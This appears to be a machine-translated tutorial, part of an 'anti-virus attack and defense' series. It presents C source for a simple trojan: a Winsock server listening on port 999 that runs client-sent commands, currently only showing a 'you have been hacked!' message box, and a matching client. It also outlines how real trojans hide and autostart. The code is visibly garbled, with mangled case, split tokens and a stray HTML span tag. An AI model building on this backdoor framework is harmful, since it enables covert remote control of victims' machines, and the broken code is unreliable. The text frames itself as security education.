Anti-virus attack and defense article 008th: Analysis and Prevention of simple Trojans

I. Preface

Generally, Trojans have both clients and servers. What we discussed last time was just a special case. After all, not everyone knows the doscommand, so now the client of the Trojan is also made into a very intuitive interface for easy operation. This article will discuss both the client and the server. What is different from the previous discussion is that this time I will directly put the dialog box program used to simulate the virus into the server, so long as the connection is successful, then, the server can directly execute the dialog box program through the commands sent by the client. Using this idea, you can add many functions to the server, but here we only discuss how to open the dialog box.

 

Ii. server implementation

The trojan mentioned here is still a command line Trojan. If the number of commands is increasing, it will be easy to forget. Therefore, for ease of use, you can add a simple help information on the Trojan server, that is, after the client enters the Help Command, the server sends the corresponding help information to the client. In addition, there may be many features, so you can set up a command distribution mechanism on the server to facilitate the execution of the corresponding functions. The complete code is as follows:

# Include <winsock2.h> # include <windows. h> # pragma comment (Lib, "ws2_32.lib ") // define the open port # define masterport 999 // define the help information # define helpmsg "Help-Show Help Menu \ r \ n" \ "hack-show MessageBox \ r \ n "" exit-Quit bdshell "// displayed dialog box void hack () {MessageBox (0, "you have been hacked! (By J. Y .) "," warning ", 0); return;} // command distribution bool dispatch (socket sock, char * szcmd) {bool Bret = false; // execute the HELP command if (! Strcmp (szcmd, "help") {send (sock, helpmsg, strlen (helpmsg) + sizeof (char), 0); Bret = true ;} // execute the hack command else if (! Strcmp (szcmd, "hack") {hack (); Bret = true;} return Bret;} int main (INT argc, char argv []) {wsadata; wsastartup (makeword (2, 2), & wsadata); socket S = socket (pf_inet, sock_stream, ipproto_tcp); sockaddr_in sockaddr; sockaddr. sin_family = pf_inet; sockaddr. sin_addr.s_un.s_addr = htonl (inaddr_any); sockaddr. sin_port = htons (masterport); BIND (S, (sockaddr *) & sockaddr, sizeof (sockaddr); liste N (s, 1); sockaddr clientaddr; int nsize = sizeof (sockaddr); socket clientsock; clientsock = accept (S, (sockaddr *) & clientaddr, & nsize ); while (true) {// send a command prompt: Send (clientsock, "bdshell>", strlen ("bdshell>") + sizeof (char), 0 ); char buff [maxbyte] = {0}; // receive the Command sent from the client. If it is exit, exit the while loop Recv (clientsock, buff, maxbyte, 0); If (! Strcmp (buff, "exit") {break;} // dispatch the command and execute bool Bret = Dispatch (clientsock, buff ); // If (Bret = false) {send (clientsock, "command unsuccessfully! ", Strlen (" command unsuccessfully! ") + Sizeof (char), 0) ;}// close socket closesocket (clientsock); closesocket (s); wsacleanup (); <span style =" font-family: arial, Helvetica, sans-serif; "> return 0; </span>}

The above code is a framework that can be constantly improved to enrich functions. The modification of functions only involves the server side, and the client does not need to be modified. However, it is not easy to develop a professional Trojan Horse to learn. The most important thing is that everything I talk about here is to learn computer security knowledge, not to sabotage it. I hope you will keep it in mind.

 

3. Client implementationThe code of the Trojan client is to send strings, which is very simple. The Code is as follows:

# Include <stdio. h> # include <conio. h> # include <winsock2.h> # include <windows. h> # pragma comment (Lib, "ws2_32.lib") // defines the open port # define masterport 999int main (INT argc, char argv []) {wsadata; wsastartup (makeword (2, 2), & wsadata); socket clientsock = socket (pf_inet, sock_stream, ipproto_tcp); sockaddr_in serveraddr; serveraddr. sin_family = pf_inet; // defines the Server IP address serveraddr. sin_addr.s_un.s_addr = inet_addr ("192". 168.1.107 "); serveraddr. sin_port = htons (masterport); Connect (clientsock, (sockaddr *) & serveraddr, sizeof (sockaddr); While (true) {char buff [maxbyte] = {0 }; char cmd [maxbyte] = {0}; // receives the command prompt sent by the server or other information Recv (clientsock, buff, maxbyte, 0 ); // handle command input errors if (! Strcmp (buff, "command unsuccessfully! ") {Printf (" % s \ r \ n ", buff); Recv (clientsock, buff, maxbyte, 0);} printf (" % s ", buff ); // enter the command scanf ("% s", CMD); // send the command send (clientsock, CMD, maxbyte, 0); // exit if (! Strcmp (CMD, "exit") {printf ("Login oot! \ R \ n "); break;} // if you enter the Help Command, the else if (! Strcmp (CMD, "help") {Recv (clientsock, buff, maxbyte, 0); printf ("% s \ r \ n", buff );} // reset the memset (buff, 0, maxbyte); memset (CMD, 0, maxbyte);} getch (); closesocket (clientsock); wsacleanup (); return 0 ;}

In my opinion, this C/S-based program is important to clearly understand the program logic and ensure that Recv () and send () are used to implement different functions () commands correspond to each other. Otherwise, incorrect information is received. For example, when the client sends the Help Command, we want to first receive the help information sent by the server and then receive the command prompt. Therefore, we need two Recv () the command is used to receive the hack command. Because the client does not need it to return a value, you only need a Recv () command to receive the command prompt. Special attention should be paid to this issue in programming.

 

Iv. Actual testI have prepared two computers for testing. First, you need to run the server program on one computer, and then run the client program on another computer, so that the client can directly connect to the server. Enter the help, hack, and Exit commands on the client in sequence for testing:

Figure 1 Enter commands on the client

When you enter the hack command, the server starts the dialog box program used to simulate viruses:

Figure 2 client startup dialog box

If you enter the exit command on the client, both the client and the server will exit. Therefore, the program compiled here is feasible and successfully reaches the purpose of the startup dialog box.

 

V. Trojan prevention

In fact, the implementation principle of the C/S Mode Trojan is basically the same as that of the online chat, both communication based on the TCP/IP protocol and message transmission. The difference is that the trojan client sends a control command to the server. After receiving the command, the server executes the corresponding function and sends the execution result to the client, this is the implementation of remote control. If the server adds its own hidden functions, copy itself to the system directory, and then automatically start ...... The server is a standard Trojan. It can be said that even complex Trojans are the same principle. What's different is that the clever Trojan program hides itself perfectly and can survive anti-virus software detection and removal, and it is difficult to completely delete ...... These will be discussed in the future.

To prevent viruses and Trojans, you must first understand them and understand their writing methods and operating principles before they can be effectively targeted. Because the example of the Trojan here is similar to the previous one, the processing method is similar, so I will not go into details here.

 

Vi. SummaryThe article on the use of simple Trojans and viruses has come to an end. In combination with previous articles, we can see that hacker programming is not difficult, and there are no very complex programs and algorithms. It is nothing more than the compilation of various API functions, the focus is on how much programmers know about the computer system. If they know more about the computer system, the more powerful the virus and Trojan horse they write, the more difficult it is to detect and kill. From my analysis articles, we can see that the scan and removal methods seem easier than writing viruses and Trojans. This is true, but since the examples I have given are relatively simple and I have a better understanding of the operating mechanisms of these programs, It is very fast to handle. In actual anti-virus work, it may take several days to analyze a very complex virus. Although there are now automated detection tools, the technology of both sides is constantly improving in the unity of confrontation between attack and defense, this is a contest of intelligence and energy. Of course, I hope that the security field will eventually win.

Anti-virus attack and defense article 008th: Analysis and Prevention of simple Trojans